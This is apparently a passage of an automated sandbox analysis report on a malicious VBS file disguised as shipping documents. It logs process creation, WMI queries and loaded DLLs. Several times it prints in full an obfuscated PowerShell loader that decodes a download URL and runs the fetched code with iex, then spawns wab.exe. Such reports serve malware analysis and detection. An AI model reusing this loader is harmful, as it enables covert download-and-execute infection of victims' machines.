            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0klmoaqc.utu.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6816
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1836
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
